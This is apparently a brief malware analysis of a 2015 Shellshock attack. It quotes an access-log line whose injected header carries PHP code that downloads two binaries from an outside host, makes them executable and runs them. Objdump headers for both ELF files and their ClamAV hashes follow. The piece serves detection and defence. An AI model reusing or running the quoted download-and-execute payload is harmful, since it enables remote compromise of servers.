188.138.40.254 - - [18/Apr/2015:05:37:08 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 523 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
The two different files are used to determine which architecture the server has.
susu1: file format elf64-x86-64
and
susu1
architecture: i386:x86-64, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000103cc0
Program Header:
LOAD off 0x0000000000000000 vaddr 0x0000000000100000 paddr 0x0000000000100000 align 2**20
filesz 0x0000000000004494 memsz 0x0000000000004494 flags r-x
LOAD off 0x0000000000009be0 vaddr 0x0000000000509be0 paddr 0x0000000000509be0 align 2**20
filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-
Sections:
Idx Name Size VMA LMA File off Algn
SYMBOL TABLE:
no symbols
susu2: file format elf32-i386
susu2
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x00c03e50
Program Header:
LOAD off 0x00000000 vaddr 0x00c01000 paddr 0x00c01000 align 2**12
filesz 0x00003631 memsz 0x00003631 flags r-x
LOAD off 0x00000d30 vaddr 0x0804fd30 paddr 0x0804fd30 align 2**12
filesz 0x00000000 memsz 0x00000000 flags rw-
Sections:
Idx Name Size VMA LMA File off Algn
SYMBOL TABLE:
no symbols
ClamAV hashes (MD5 and SHA-256)
- 5bc85adb6368be6a5321238377802ffd:18248:susu1
- 381ea0197f00afe0d8e26bb48b71254b:14492:susu2
- 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af:14492:susu2
- 3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016:18248:susu1